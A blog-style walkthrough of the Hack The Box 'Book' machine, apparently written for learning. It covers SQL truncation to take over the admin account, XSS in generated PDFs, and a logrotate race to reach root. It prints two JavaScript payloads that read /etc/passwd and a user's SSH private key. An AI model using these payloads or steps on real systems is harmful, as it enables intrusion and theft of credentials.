BOOK — HTB Machine
A medium Linux machine is a great way to keep yourself busy on the weekends… let’s get started with the scanning of the IP.
I use my personal script to scan the IP …….
in the fast scan — — i got these two classic ports open
Then I ran a dibuster to find out about the directories and map those ….
To narrow down the places to scan…..
Let’s sign up to login on the page….
Greeted with Library Home Page… Will explore the functionalities available on this page
payload.php was uploaded but there is place to find it, I tried to access docs but it is my permissions are not enough to access and there is no other way i found where the uploaded files are stored.
admin@book.htb — — — ADMIN E-Mail …. can be useful
a edit profile option is also present…
Couldn’t find anything useful related to XSS but only 10 characters are available for username…..
since it is updating value so there might be some way to connect this with database vulnerabilities specially SQL related…
So upon trying several times and reading a java scipt note on the page i found out that
name can be 10 char long
email can be 20 char long
with right number of spaces
I used
admin@book.htb++++++ in place of admin@book.htb
giving me access to the page as admin user!!
was still signed in as a user so to get the admin access i had to login through the admin portal let’s go
While trying this it is saying Nope So let’s get in via BURP …….
999 tries later ….. We are finally in as admin
Upon loggin in and clicking on collection data we are getting this table and with a little tweaking in the author name we can do this
I have used img tag to direct a request on my IP let’s see if it works
YESS it does…
Now let’s try to exploit this in order to get something useful to get a foothold on the machine
Upon searching Javascript for local file read and XSS for local file read, I found this link helpful :
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open(“GET”,”file:///etc/passwd”);x.send();
</script>
With a script to read etc/passwd, i read this
Now that we have this we can move further to get a reverse shell if possible
<script>
x = new XMLHttpRequest();
x.onload = function() {
var content = this.responseText;
var boxedContent = ‘<div style=”border: 1px solid black; padding: 10px; margin: 10px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto;”><pre>’ + content + ‘</pre></div>’;
document.body.innerHTML = boxedContent;
};
x.open(“GET”, “file:///home/reader/.ssh/id_rsa”);
x.send();
</script>
After rigorous trial and error i finally found a good code to show me id_rsa key properly ..
Finally the foothold ..
with that user flag is submitted !!
To analyse the machine better i wget LINPEAS.SH on the machine and then in the output i find this
access.log file in the reader/backups directory !!
Where we have writing access !!
coming to the checklist I find this … searching for logtotten exploit redirects me to logrotate exploit … Hence there we Go
With an article’s help I found pspy32 and upon using that I got that logrotate is being used on log.cfg related to this there is a vulnerability and this version is also vulnerable to that vulnerabilty which might help me to get a root shell on the box :
I transferred logrotten to the target machine and upon compiling the file with gcc I got an executable…
and with the steps given in the README.md I m hoping to get root shell …..
Let’s execute
Let’s wait for sometime to see if we get a call back or not…
Ok so i tried everything but it was not working so it was time to get a little creative i thought if i can not connect to the server maybe there is some issue then i should try to at least read it and save it some place safe….
So with this i changed the payload.sh to
And after less than a minute i got the flag……
AND the task is completed but if someone has connected sucessfully to the box recently then pls share your thought about what could have went wrong in connecting to the machine..
THANKS…..
My Reveiw:
A very interesting room on exploiting SQL truncation, but getting anything done on the root side is a hustle in itself …. After trying a lot of time to connect in the end i had to take the high road and get creative about it… But it is indeed a learning lesson and I loved the Machine 🎉🥳
